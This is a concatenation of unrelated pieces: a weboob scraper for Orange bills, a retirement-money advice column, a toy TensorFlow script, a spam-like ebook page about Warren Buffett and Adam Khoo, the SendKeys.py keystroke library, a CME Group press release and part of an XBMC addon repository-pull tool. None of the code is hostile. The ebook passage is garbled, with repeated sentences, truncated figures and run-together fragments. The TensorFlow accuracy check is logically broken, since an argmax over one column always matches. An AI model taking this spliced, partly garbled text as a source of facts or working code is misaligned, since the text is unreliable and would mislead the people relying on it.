# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
try:
from html.parser import HTMLParser
except ImportError:
import HTMLParser
from weboob.browser.pages import HTMLPage, LoggedPage, JsonPage
from weboob.capabilities.bill import Subscription
from weboob.browser.elements import DictElement, ListElement, ItemElement, method, TableElement
from weboob.browser.filters.standard import (
CleanDecimal, CleanText, Env, Field,
Regexp, Date, Currency, BrowserURL,
Format, Eval, Lower,
)
from weboob.browser.filters.html import Link, TableCell
from weboob.browser.filters.javascript import JSValue
from weboob.browser.filters.json import Dict
from weboob.capabilities.base import NotAvailable
from weboob.capabilities.bill import DocumentTypes, Bill
from weboob.tools.date import parse_french_date
from weboob.tools.compat import urlencode
class BillsApiProPage(LoggedPage, JsonPage):
    """JSON page listing the bills of a professional Orange subscription."""
    @method
    class get_bills(DictElement):
        item_xpath = 'bills'
        # orange's API will sometimes return the temporary bill for the current month along with other bills
        # in the json. The url will lead to the exact same document, this is probably not intended behaviour and
        # causes weboob to raise a DataError as they'll have identical ids.
        ignore_duplicate = True
        class item(ItemElement):
            klass = Bill
            obj_date = Date(Dict('dueDate'), parse_func=parse_french_date, default=NotAvailable)
            obj_price = CleanDecimal(Dict('amountIncludingTax'))
            obj_format = 'pdf'
            def obj_label(self):
                return 'Facture du %s' % Field('date')(self)
            def obj_id(self):
                # Synthetic id: subscription id + bill date (the API gives
                # no stable bill identifier usable across pages).
                return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
            def get_params(self):
                # Query-string parameters required by the download URL.
                params = {'billid': Dict('id')(self), 'billDate': Dict('dueDate')(self)}
                return urlencode(params)
            obj_url = BrowserURL('doc_api_pro', subid=Env('subid'), dir=Dict('documents/0/mainDir'), fact_type=Dict('documents/0/subDir'), billparams=get_params)
            obj__is_v2 = False
class BillsApiParPage(LoggedPage, JsonPage):
    """JSON page listing the bills of a personal ("particulier") subscription."""
    @method
    class get_bills(DictElement):
        item_xpath = 'billsHistory/billList'
        class item(ItemElement):
            klass = Bill
            obj_date = Date(Dict('date'), default=NotAvailable)
            # Amount is divided by 100 — presumably returned in cents by the
            # API; confirm against the endpoint if it changes.
            obj_price = Eval(lambda x: x / 100, CleanDecimal(Dict('amount')))
            obj_format = 'pdf'
            def obj_label(self):
                return 'Facture du %s' % Field('date')(self)
            def obj_id(self):
                # Synthetic id: subscription id + bill date (no native id).
                return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
            obj_url = Format('%s%s', BrowserURL('doc_api_par'), Dict('hrefPdf'))
            obj__is_v2 = True
# is BillsPage deprecated ?
class BillsPage(LoggedPage, HTMLPage):
    """Legacy HTML bills page, scraped from a table on the web site."""
    @method
    class get_bills(TableElement):
        item_xpath = '//table[has-class("table-hover")]/div/div/tr | //table[has-class("table-hover")]/div/tr'
        head_xpath = '//table[has-class("table-hover")]/thead/tr/th'
        col_date = 'Date'
        col_amount = ['Montant TTC', 'Montant']
        col_ht = 'Montant HT'
        col_url = 'Télécharger'
        col_infos = 'Infos paiement'
        class item(ItemElement):
            klass = Bill
            obj_type = DocumentTypes.BILL
            obj_format = "pdf"
            # TableCell('date') can have other info like: 'duplicata'
            obj_date = Date(CleanText('./td[@headers="ec-dateCol"]/text()[not(preceding-sibling::br)]'), parse_func=parse_french_date, dayfirst=True)
            def obj__cell(self):
                # sometimes the link to the bill is not in the right column (Thanks Orange!!)
                if CleanText(TableCell('url')(self))(self):
                    return 'url'
                return 'infos'
            def obj_price(self):
                # Prefer the tax-included column; fall back to the pre-tax one.
                if CleanText(TableCell('amount')(self))(self):
                    return CleanDecimal(Regexp(CleanText(TableCell('amount')), '.*?([\d,]+).*', default=NotAvailable), replace_dots=True, default=NotAvailable)(self)
                else:
                    return Field('_ht')(self)
            def obj_currency(self):
                # Currency comes from whichever amount column is populated.
                if CleanText(TableCell('amount')(self))(self):
                    return Currency(TableCell('amount')(self))(self)
                else:
                    return Currency(TableCell('ht')(self))(self)
            # Only when a list of documents is present
            obj__url_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*?contentList[\d]+ \+= \'<li><a href=".*\"(.*?idDocument=2)"', default=None)
            def obj_url(self):
                if Field('_url_base')(self):
                    # URL won't work if HTML is not unescape
                    return HTMLParser().unescape(str(Field('_url_base')(self)))
                return Link(TableCell(Field('_cell')(self))(self)[0].xpath('./a'), default=NotAvailable)(self)
            obj__label_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*</span>(.*?)</a.*', default=None)
            def obj_label(self):
                if Field('_label_base')(self):
                    return HTMLParser().unescape(str(Field('_label_base')(self)))
                else:
                    return CleanText(TableCell(Field('_cell')(self))(self)[0].xpath('.//span[@class="ec_visually_hidden"]'))(self)
            obj__ht = CleanDecimal(TableCell('ht', default=NotAvailable), replace_dots=True, default=NotAvailable)
            def obj_vat(self):
                # VAT = tax-included price minus pre-tax amount; unavailable
                # (implicit None) if either side is missing.
                if Field('_ht')(self) is NotAvailable or Field('price')(self) is NotAvailable:
                    return
                return Field('price')(self) - Field('_ht')(self)
            def obj_id(self):
                # Synthetic id from subscription, date and an amount so that
                # bills lacking a TTC price still get a distinct id.
                if Field('price')(self) is NotAvailable:
                    return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('_ht')(self))
                else:
                    return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('price')(self))
class SubscriptionsPage(LoggedPage, HTMLPage):
    def build_doc(self, data):
        # The interesting HTML is produced by JavaScript: it is the string
        # argument of a stripslashes() call assigned to the banner container.
        # Extract that string, decode it as a JS value and parse it as HTML.
        # NOTE(review): implicitly returns None when no line matches —
        # confirm callers handle an empty document.
        data = data.decode(self.encoding)
        for line in data.split('\n'):
            mtc = re.match('necFe.bandeau.container.innerHTML\s*=\s*stripslashes\((.*)\);$', line)
            if mtc:
                html = JSValue().filter(mtc.group(1)).encode(self.encoding)
                return super(SubscriptionsPage, self).build_doc(html)
    @method
    class iter_subscription(ListElement):
        item_xpath = '//ul[@id="contractContainer"]//a[starts-with(@id,"carrousel-")]'
        class item(ItemElement):
            klass = Subscription
            # Contract id and page name are embedded in the link target.
            obj_id = Regexp(Link('.'), r'\bidContrat=(\d+)', default='')
            obj__page = Regexp(Link('.'), r'\bpage=([^&]+)', default='')
            obj_label = CleanText('.')
            obj__is_pro = False
            def validate(self, obj):
                # unsubscripted contracts may still be there, skip them else
                # facture-historique could yield wrong bills
                return bool(obj.id) and obj._page != 'nec-tdb-ouvert'
class SubscriptionsApiPage(LoggedPage, JsonPage):
    """JSON subscriptions endpoint; closed ('CLOS') contracts are skipped."""
    @method
    class iter_subscription(DictElement):
        item_xpath = 'contracts'
        class item(ItemElement):
            klass = Subscription
            def condition(self):
                # Ignore terminated contracts.
                return Dict('contractStatus')(self) != 'CLOS'
            obj_id = Dict('contractId')
            obj_label = Dict('offerName')
            obj__is_pro = False
class ContractsPage(LoggedPage, JsonPage):
    """JSON contract list (legacy endpoint); yields one Subscription per
    contract whose status is 'OK'."""
    @method
    class iter_subscriptions(DictElement):
        item_xpath = 'contracts'
        class item(ItemElement):
            klass = Subscription
            obj_id = Dict('id')
            obj_label = Format('%s %s', Dict('name'), Dict('mainLine'))
            obj__from_api = False
            def condition(self):
                # Only keep contracts the API reports as usable.
                return Dict('status')(self) == 'OK'
            def obj__is_pro(self):
                return Dict('offerNature')(self) == 'PROFESSIONAL'
class ContractsApiPage(LoggedPage, JsonPage):
    """JSON API endpoint listing contracts."""

    @method
    class iter_subscriptions(DictElement):
        item_xpath = 'contracts'

        class item(ItemElement):
            klass = Subscription

            obj_id = CleanText(Dict('cid'))
            obj_label = Dict('offerName')

            def obj_subscriber(self):
                # Holder names may be partially missing; join whatever is present.
                names = (
                    CleanText(Dict('holder/firstName', default=""))(self),
                    CleanText(Dict('holder/lastName', default=""))(self),
                )
                assert any(names), "At least one name field should be populated. Has the page changed?"
                return ' '.join([n for n in names if n])

            def obj__is_pro(self):
                # 'PAR' (particulier / consumer) is the default market type
                return Dict('telco/marketType', default='PAR')(self) == 'PRO'

            obj__from_api = True

            def condition(self):
                # only keep active ('actif') subscriptions
                return Lower(Dict('status'))(self) == 'actif'
|
Ray’s Take: It’s a conversation no one wants to have; however, it’s important to have at least an idea of how financially prepared your parents are for their retirement. People are living longer – much longer – and the costs for senior care are soaring. Many older Americans saw a large portion of their nest egg disappear in the last recession.
All these factors explain why the percentage of adult children providing some level of care for their parents has more than tripled in the past 15 years, including 41 percent of the baby boomer generation.
Your parents might not welcome inquiries about their financial situation. They could see it as none of your business, or an attempt to take control. It can help to involve a third party. Ask them to go with you to a financial seminar for retirees or set up a joint appointment with a financial adviser for a consultation.
By bringing in an outside professional you give everyone a greater sense of comfort when discussing money matters. Otherwise it’s too easy to revert to old “parent-child” roles.
If it turns out your parents are in good shape, all you need to do is make sure you know where all their important paperwork is – original wills, financial records, insurance policies, powers of attorney – or know who does know this. Plus, find out if there’s a lock box and where the key is.
If you learn your parents are not in good shape financially, you and your siblings might need to step in. There may be assets that can be sold to increase savings. It might be time to consider a reverse mortgage on their home, though this is usually a last resort. You might need to open your home to them.
You’ll want to do what you can to help, just be sure not to put your own financially secure retirement at risk in the process.
Dana’s Take: Parents are always talking about setting up college funds for their kids, often giving that goal priority over saving for their own retirement. This can be a costly mistake for both generations.
When you take saving for your own retirement seriously, you’re freeing your children from what could be a tremendous financial burden later. The best gift you can ever give your children and grandchildren is your own financial independence.
If you run out of money in your senior years – or don’t have enough to meet basic needs – who will pick up the slack? Is that the legacy you want to give your kids?
Paying for a college education for your kids is admirable, but don’t let it sink your own future. Your kids would be much better off paying for their own higher education now and not supporting you at the same time they’re trying to raise your grandchildren.
|
# Start a session, which transfers the computation to a C++ environment
# where it is optimized for performance.
import tensorflow as tf
import random as rn
import trainingFunctions as funcs
sess = tf.InteractiveSession()
# Helpers for creating the model's weight and bias Variables.
def weight_variable(shape):
    """Return a weight Variable initialised with small truncated-normal noise.

    The slight noise (stddev 0.1) breaks symmetry between units so they do
    not all learn the same function.
    """
    noise = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(noise)
def bias_variable(shape):
    """Return a bias Variable initialised to a small positive constant.

    Starting slightly above zero helps avoid dead neurons.
    """
    start = tf.constant(0.1, shape=shape)
    return tf.Variable(start)
def conv2d(x, W):
    """2-D convolution with stride 1 and 'SAME' (zero) padding, so the
    spatial output size equals the input size."""
    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
    """2x2 max-pooling with stride 2, halving each spatial dimension."""
    window = [1, 2, 2, 1]
    return tf.nn.max_pool(x, ksize=window, strides=window, padding='SAME')
# Placeholders that TensorFlow will be asked to fill at run time.
# shape=[None, 1]: a 2-D tensor with any batch size and one feature.
x = tf.placeholder(tf.float32, shape=[None, 1])
y_ = tf.placeholder(tf.float32, shape=[None, 1])
# A Variable is a value that lives in TensorFlow's computation graph.
W = tf.Variable(tf.zeros([1,1])) # W is a 1x1 matrix: one input, one output
b = tf.Variable(tf.zeros([1])) # b is a 1-dimensional bias (single output unit)
# Initialize the variables in this session.
sess.run(tf.initialize_all_variables())
# Multiply the input by the weight matrix and add the bias.
y = tf.nn.sigmoid(tf.matmul(x,W) + b)
# Cost function we minimize: cross-entropy between target and prediction.
# NOTE(review): tf.log(y) is -inf/NaN when y reaches 0 -- presumably the
# sigmoid keeps y strictly inside (0, 1); confirm, or clip y for safety.
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y)))
# Add a new operation to the computation graph:
# train_step applies gradient-descent updates to the parameters.
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
# Repeatedly calling train_step trains the model on fresh random batches.
for i in range(100):
    init = 100
    valArr = [0] * init
    ansArr = [0] * init
    for k in range(init):
        ranVal = rn.randint(1, 100)
        ans = funcs.adder(ranVal)
        valArr[k] = [ranVal]
        ansArr[k] = [ans]
    # feed_dict fills the placeholders declared above
    train_step.run(feed_dict={x: valArr, y_: ansArr})
# Checks whether the predicted label and the actual label are equal.
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
# Casts [True, False, True, True] to [1, 0, 1, 1] and takes the mean (accuracy).
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# init = 100
# valArr = [0] * init
# ansArr = [0] * init
# for k in range(init):
#     ranVal = rn.randint(1, 10000)
#     ans = funcs.adder(ranVal)
#     valArr[k] = [ranVal]
#     ansArr[k] = [ans]
# print(accuracy.eval(feed_dict={x: valArr, y_: ansArr}))
# Interactive loop: evaluate the trained model on user-supplied values.
while True:
    val = int(input("Enter val to add: "))
    # prediction = tf.argmax(y, 1)
    classification = y.eval(feed_dict = {x: [[val]]})
    print(classification)
|
He is considered one of the most successful investors in the world and has a net worth of US$ 84. Khoo is the Executive chairman one of Asia' s largest private educational institutions, Chief Master Trainer of Adam Khoo Learning Technologies Group which runs. Is the best free ebooks download library.
Warren Edward Buffett ( / ˈ b ʌ f ɪ t / ; born August 30, 1930) is an American business magnate, investor, speaker and philanthropist who serves as the chairman and CEO of Berkshire Hathaway. It's the open directory for free ebooks, the best place to read ebooks and search free download links, and the best free ebooks download library. Buffettology pdf free. Initially, I purchased a newer HP calculator to make the calculations in "Buffettology" by Mary Buffett and David Clark.
4 billion as of November 1,, making him the third- wealthiest person in the world. After struggling for 6 to 8 hours, I realized that the problems solved in the documentation that accompanied my purchase had nothing to do with the problems I was trying to solve. Adam Khoo Yean Ann is a Singaporean entrepreneur author, trainer FX trader.
Is the best free ebooks download library. It' s the open directory for free ebooks and download links, and the best place to read ebooks and search free download is the best free ebooks download library. It' s the open directory for free ebooks and download links, and the best place to read ebooks and search free download itially, I purchased a newer HP calculator to make the calculations in " Buffettology" by Mary Buffett and David Clark.
After struggling for 6 to 8 hours, I realized that the problems solved in the documentation that accompanied my purchase had nothing to do with the problems I was trying to solve.
Adam Khoo Yean Ann is a Singaporean entrepreneur, author, trainer and a stocks and FX trader. Khoo is the Executive chairman and Chief Master Trainer of Adam Khoo Learning Technologies Group, one of Asia' s largest private educational institutions,.
Warren Edward Buffett ( / ˈ b ʌ f ɪ t / ; born August 30, 1930) is an American business magnate, investor, speaker and philanthropist who serves as the chairman and CEO of Berkshire Hathaway. He is considered one of the most successful investors in the world and has a net worth of US$ 84.
4 billion as of November 1,, making him the third- wealthiest person in the chive from Schiff' s Insurance Observer. December 1, 1999 Vol. 4 Right Time, Wrong Place: The slow poison of the insurance cycle.
|
"""
SendKeys.py - Sends one or more keystroke or keystroke combinations
to the active window.
Copyright (C) 2003 Ollie Rutherfurd <oliver@rutherfurd.net>
Python License
Version 0.3 (2003-06-14)
$Id$
"""
#From: https://code.google.com/p/sendkeys-ctypes/
import sys
import time
from _sendkeys import char2keycode, key_up, key_down, toggle_numlock
__all__ = ['KeySequenceError', 'SendKeys']
# Compatibility shim: define True/False on ancient Pythons (pre-2.2.1)
# where the boolean constants do not exist yet.
try:
    True
except NameError:
    True,False = 1,0
KEYEVENTF_KEYUP = 2
VK_SHIFT = 16
VK_CONTROL = 17
VK_MENU = 18

PAUSE = 50/1000.0 # 50 milliseconds

# 'codes' recognized as {CODE( repeat)?}
# Symbolic key names -> Windows virtual-key codes.
# (The original listing repeated 'DOWN' and 'BACKSPACE'; a dict literal keeps
# only the last occurrence anyway, so the duplicates were dropped.)
CODES = {
    'BACK': 8,
    'BACKSPACE': 8,
    'BS': 8,
    'BKSP': 8,
    'BREAK': 3,
    'CAP': 20,
    'CAPSLOCK': 20,
    'DEL': 46,
    'DELETE': 46,
    'DOWN': 40,
    'END': 35,
    'ENTER': 13,
    'ESC': 27,
    'HELP': 47,
    'HOME': 36,
    'INS': 45,
    'INSERT': 45,
    'LEFT': 37,
    'LWIN': 91,
    'NUMLOCK': 144,
    'PGDN': 34,
    'PGUP': 33,
    'PRTSC': 44,
    'RIGHT': 39,
    'RMENU': 165,
    'RWIN': 92,
    'SCROLLLOCK': 145,
    'SPACE': 32,
    'TAB': 9,
    'UP': 38,
    'F1': 112,
    'F2': 113,
    'F3': 114,
    'F4': 115,
    'F5': 116,
    'F6': 117,
    'F7': 118,
    'F8': 119,
    'F9': 120,
    'F10': 121,
    'F11': 122,
    'F12': 123,
    'F13': 124,
    'F14': 125,
    'F15': 126,
    'F16': 127,
    'F17': 128,
    'F18': 129,
    'F19': 130,
    'F20': 131,
    'F21': 132,
    'F22': 133,
    'F23': 134,
    'F24': 135,
}

# characters that must be escaped with {} to be sent literally
ESCAPE = '+^%~{}[]'
# escaped characters that never need SHIFT
NO_SHIFT = '[]'

# shifted character -> unshifted key that produces it (US layout)
SHIFT = {
    '!': '1',
    '@': '2',
    '#': '3',
    '$': '4',
    '&': '7',
    '*': '8',
    '_': '-',
    '|': '\\',
    ':': ';',
    '"': '\'',
    '<': ',',
    '>': '.',
    '?': '/',
}

# modifier keys
MODIFIERS = {
    '+': VK_SHIFT,
    '^': VK_CONTROL,
    '%': VK_MENU,
}
class KeySequenceError(Exception):
    """Raised when a key-sequence string cannot be parsed."""

    def __str__(self):
        # join the message fragments passed to the constructor
        return ' '.join(self.args)
def _append_code(keys,code):
keys.append((code, True))
keys.append((code, False))
def _next_char(chars,error_msg=None):
if error_msg is None:
error_msg = 'expected another character'
try:
return chars.pop()
except IndexError:
raise KeySequenceError(error_msg)
def _handle_char(c, keys, shift):
    """Emit the press/release pair for *c*, wrapped in SHIFT when requested."""
    shift_vk = MODIFIERS['+']
    if shift:
        keys.append((shift_vk, True))
    _append_code(keys, char2keycode(c))
    if shift:
        keys.append((shift_vk, False))
def _release_modifiers(keys, modifiers):
    """Append release events for every modifier currently held down."""
    for symbol in modifiers.keys():
        if modifiers[symbol]:
            keys.append((MODIFIERS[symbol], False))
            modifiers[symbol] = False
def str2keys(key_string,
             with_spaces=False,
             with_tabs=False,
             with_newlines=False):
    """
    Converts `key_string` string to a list of 2-tuples,
    ``(keycode,down)``, which can be given to `playkeys`.

    `key_string` : str
        A string of keys.
    `with_spaces` : bool
        Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
    `with_tabs` : bool
        Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
    `with_newlines` : bool
        Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
    """
    # reading input as a stack
    chars = list(key_string)
    chars.reverse()
    # results
    keys = []
    # for keeping track of whether shift, ctrl, & alt are pressed
    modifiers = {}
    for k in MODIFIERS.keys():
        modifiers[k] = False
    while chars:
        c = chars.pop()
        if c in MODIFIERS.keys():
            # modifier prefix (+, ^, %): press now, release after next key
            keys.append((MODIFIERS[c],True))
            modifiers[c] = True
        # group of chars, for applying a modifier
        elif c == '(':
            while c != ')':
                c = _next_char(chars,'`(` without `)`')
                if c == ')':
                    # only reachable on an empty '()' group
                    raise KeySequenceError('expected a character before `)`')
                if c == ' ' and with_spaces:
                    _handle_char(CODES['SPACE'], keys, False)
                elif c == '\n' and with_newlines:
                    _handle_char(CODES['ENTER'], keys, False)
                elif c == '\t' and with_tabs:
                    _handle_char(CODES['TAB'], keys, False)
                else:
                    # if we need shift for this char and it's not already pressed
                    shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
                    if c in SHIFT.keys():
                        _handle_char(SHIFT[c], keys, shift)
                    else:
                        _handle_char(c.lower(), keys, shift)
                # NOTE(review): this pop's value is only tested by the loop
                # condition; when it is not ')' the pop at the top of the
                # loop overwrites it, so groups of more than one character
                # appear to mis-parse -- confirm against the upstream
                # sendkeys-ctypes source before relying on `(...)` groups.
                c = _next_char(chars,'`)` not found')
            _release_modifiers(keys,modifiers)
        # escaped code, modifier, or repeated char
        elif c == '{':
            saw_space = False
            # collect the code name and an optional numeric argument that is
            # separated from the name by a space, e.g. {LEFT 4} or {PAUSE .5}
            name = [_next_char(chars)]
            arg = ['0']
            c = _next_char(chars, '`{` without `}`')
            while c != '}':
                if c == ' ':
                    saw_space = True
                elif c in '.0123456789' and saw_space:
                    arg.append(c)
                else:
                    name.append(c)
                c = _next_char(chars, '`{` without `}`')
            code = ''.join(name)
            arg = float('0' + ''.join(arg))
            if code == 'PAUSE':
                # {PAUSE n}: emit a (None, seconds) entry; playkeys sleeps
                if not arg:
                    arg = PAUSE
                keys.append((None,arg))
            else:
                # always having 1 here makes logic
                # easier -- we can always loop
                if arg == 0:
                    arg = 1
                for i in range(int(arg)):
                    if code in CODES.keys():
                        _append_code(keys, CODES[code])
                    else:
                        # must be an escaped modifier or a
                        # repeated char at this point
                        if len(code) > 1:
                            raise KeySequenceError('Unknown code: %s' % code)
                        # handling both {e 3} and {+}, {%}, {^}
                        shift = code in ESCAPE and not code in NO_SHIFT
                        # do shift if we've got an upper case letter
                        shift = shift or code[0].isupper()
                        c = code
                        if not shift:
                            # handle keys in SHIFT (!, @, etc...)
                            if c in SHIFT.keys():
                                c = SHIFT[c]
                                shift = True
                        _handle_char(c.lower(), keys, shift)
            _release_modifiers(keys,modifiers)
        # unexpected ")"
        elif c == ')':
            raise KeySequenceError('`)` should be preceeded by `(`')
        # unexpected "}"
        elif c == '}':
            raise KeySequenceError('`}` should be preceeded by `{`')
        # handling a single character
        else:
            if c == ' ' and not with_spaces:
                continue
            elif c == '\t' and not with_tabs:
                continue
            elif c == '\n' and not with_newlines:
                continue
            if c in ('~','\n'):
                # '~' is shorthand for ENTER
                _append_code(keys, CODES['ENTER'])
            elif c == ' ':
                _append_code(keys, CODES['SPACE'])
            elif c == '\t':
                _append_code(keys, CODES['TAB'])
            else:
                # if we need shift for this char and it's not already pressed
                shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
                if c in SHIFT.keys():
                    _handle_char(SHIFT[c], keys, shift)
                else:
                    _handle_char(c.lower(), keys, shift)
            # pending modifiers apply to a single following key only
            _release_modifiers(keys,modifiers)
    _release_modifiers(keys,modifiers)
    return keys
def playkeys(keys, pause=.05):
    """
    Simulates pressing and releasing one or more keys.

    `keys` : list
        A list of 2-tuples ``(keycode, down)`` as returned by `str2keys`,
        where `down` is `True` for a press and `False` for a release.
        An entry of ``(None, seconds)`` requests an explicit pause.
    `pause` : float
        Number of seconds between releasing a key and pressing the
        next one.
    """
    for vk, arg in keys:
        if not vk:
            # (None, seconds): an explicit {PAUSE n} entry
            time.sleep(arg)
            continue
        if arg:
            key_down(vk)
        else:
            key_up(vk)
            if pause: # pause after key up
                time.sleep(pause)
def SendKeys(keys,
             pause=0.05,
             with_spaces=False,
             with_tabs=False,
             with_newlines=False,
             turn_off_numlock=True):
    """
    Sends keys to the current window.

    `keys` : str
        A string of keys.
    `pause` : float
        The number of seconds to wait between sending each key
        or key combination.
    `with_spaces` : bool
        Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
    `with_tabs` : bool
        Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
    `with_newlines` : bool
        Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
    `turn_off_numlock` : bool
        Whether to turn off `NUMLOCK` before sending keys.

    example::

        SendKeys("+hello{SPACE}+world+1")

    would result in ``"Hello World!"``
    """
    restore_numlock = False
    try:
        # read keystroke keys into a list of 2 tuples [(key,up),]
        _keys = str2keys(keys, with_spaces, with_tabs, with_newlines)

        # certain keystrokes don't seem to behave the same way if NUMLOCK
        # is on (for example, ^+{LEFT}), so turn NUMLOCK off, if it's on
        # and restore its original state when done.
        if turn_off_numlock:
            restore_numlock = toggle_numlock(False)

        # "play" the keys to the active window
        playkeys(_keys, pause)
    finally:
        # restore NUMLOCK by simulating one press/release of the key
        if restore_numlock and turn_off_numlock:
            key_down(CODES['NUMLOCK'])
            key_up(CODES['NUMLOCK'])
def usage():
    """
    Writes help message to `stderr` and exits with status 1.
    """
    message = """\
%(name)s [-h] [-d seconds] [-p seconds] [-f filename] or [string of keys]

    -dN or --delay=N : N is seconds before starting
    -pN or --pause=N : N is seconds between each key
    -fNAME or --file=NAME : NAME is filename containing keys to send
    -h or --help : show help message
""" % {'name': 'SendKeys.py'}
    sys.stderr.write(message)
    sys.stderr.write('\n')
    sys.exit(1)
def error(msg):
    """
    Writes `msg` to `stderr`, displays usage
    information, and exits.
    """
    sys.stderr.write('\nERROR: %s\n' % msg)
    sys.stderr.write('\n')
    usage()
def main(args=None):
    """Command-line entry point: parse options, then send the keys."""
    import getopt
    if args is None:
        args = sys.argv[1:]
    try:
        # BUGFIX: long options that take a value need a trailing '='
        # ("pause=", not "pause"); without it getopt never accepts an
        # argument for --pause/--delay/--file.
        opts,args = getopt.getopt(args,
            "hp:d:f:", ["help","pause=","delay=","file="])
    except getopt.GetoptError:
        usage()
    pause=0
    delay=0
    filename=None
    for o, a in opts:
        if o in ('-h','--help'):
            usage()
        elif o in ('-f','--file'):
            filename = a
        elif o in ('-p','--pause'):
            try:
                pause = float(a)
                assert pause >= 0
            except (ValueError,AssertionError):
                error('`pause` must be >= 0.0')
        elif o in ('-d','--delay'):
            try:
                delay = float(a)
                assert delay >= 0
            except (ValueError,AssertionError):
                error('`delay` must be >= 0.0')
    # optional start-up delay before any key is sent
    time.sleep(delay)
    if not filename is None and args:
        error("can't pass both filename and string of keys on command-line")
    elif filename:
        # read the key string from a file
        f = open(filename)
        keys = f.read()
        f.close()
        SendKeys(keys, pause)
    else:
        for a in args:
            SendKeys(a, pause)
# Allow use as a command-line tool as well as an importable library.
if __name__ == '__main__':
    main(sys.argv[1:])
# :indentSize=4:lineSeparator=\r\n:maxLineLen=80:noTabs=true:tabSize=4:
|
Derivatives marketplace operator CME Group Inc (NASDAQ:CME) announced the appointment of a new member to its Competitive Markets Advisory Council (CMAC), Jacob Frenkel, Chairman of the Board of Trustees for the Group of Thirty (G-30), a private, nonprofit, international body comprised of financial industry leaders; as well as Chairman of the Board of Governors of Tel Aviv University and Chairman of JPMorgan Chase International.
Frenkel also served as Chairman and CEO of the G-30 from 2001-2011, as Vice Chairman of American International Group, Inc. from 2004-2009, and as Chairman of Merrill Lynch International from 2000-2004.
Previously, he served two terms as Governor of the Bank of Israel from 1991-2000. Prior to this, he was the Economic Counselor and Director of Research at the International Monetary Fund, and the David Rockefeller Professor of International Economics at the University of Chicago. He is the recipient of the 2002 Israel Prize in Economics, among numerous other distinctions.
CMAC was established in March 2004 by Nobel Laureates Myron Scholes and Gary Becker in partnership with CME Group Chairman Emeritus Leo Melamed. The Council consists of financial experts, including Nobel Prize winners, who serve as a “think tank” to develop and provide advice to the CME Board in the form of policy, analysis, position papers and other strategic recommendations on significant market issues. Notably, CMAC plays an integral leadership role within the CME Group Center for Innovation by selecting the annual recipients of the CME Group Melamed-Arditti Innovation Award and the CME Group-MSRI Prize in Innovative Quantitative Applications.
“I am pleased to join this group of my former University of Chicago Colleagues and other distinguished economists at the Competitive Markets Advisory Council of the CME Group,” said Frenkel.
“I am delighted that Dr. Frenkel has accepted our nomination to become a member of the CMAC,” said Leo Melamed, CME Group Chairman Emeritus and CMAC Vice Chairman. “The addition of this accomplished economic thought leader will strengthen the Council’s commitment to fostering innovation and dialogue on issues that impact the global markets.”
“The CMAC provides our Board with groundbreaking insights and cutting-edge analysis from some of the world’s top economic thought leaders,” said CME Group Chairman and Chief Executive Officer Terry Duffy. “We are honored that Dr. Frenkel, an influential expert on global market issues, will be joining the Council.”
|
# -*- coding: utf-8 -*-
"""
addonpr command module
Copyright (C) 2012-2013 Team XBMC
http://www.xbmc.org
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; see the file LICENSE. If not, see
<http://www.gnu.org/licenses/>.
"""
import os
import sys
import shlex
import shutil
import subprocess
import urllib
import zipfile
import logging
logger = logging.getLogger(__name__)
def run(cmd):
    """Execute *cmd* in a shell-free subprocess and return its stripped output.

    On a non-zero exit status the command output is written to stderr and
    the process exits with the subprocess return code.
    """
    cmd = cmd.encode('utf-8')
    logger.debug('Run %s', cmd)
    try:
        output = subprocess.check_output(shlex.split(cmd))
    except subprocess.CalledProcessError as exc:
        sys.stderr.write(exc.output)
        sys.exit(exc.returncode)
    return output.strip()
def silent_remove(filenames):
    """Delete every file in *filenames*, ignoring missing-file errors."""
    for path in filenames:
        try:
            os.remove(path)
        except OSError:
            # file absent or not removable -- best-effort cleanup
            pass
def git_pull(addon, url, revision):
    """Export *revision* of a git repository into directory *addon*.

    Clones, checks out the revision, then strips VCS metadata so only the
    addon files remain.
    """
    current_dir = os.getcwd()
    run('git clone -q "%s" %s' % (url, addon))
    os.chdir(addon)
    try:
        run('git checkout -q "%s"' % revision)
        # drop repository metadata so only the addon files remain
        shutil.rmtree('.git')
        silent_remove(['.gitignore', '.gitattributes'])
    finally:
        # BUGFIX: always restore the working directory, even when
        # rmtree (or the checkout) raises.
        os.chdir(current_dir)
def svn_pull(addon, url, revision):
    """Export *revision* of a subversion repository into directory *addon*."""
    run('svn export "%s" -r "%s" %s' % (url, revision, addon))
def hg_pull(addon, url, revision):
    """Clone *revision* of a mercurial repository and strip VCS metadata."""
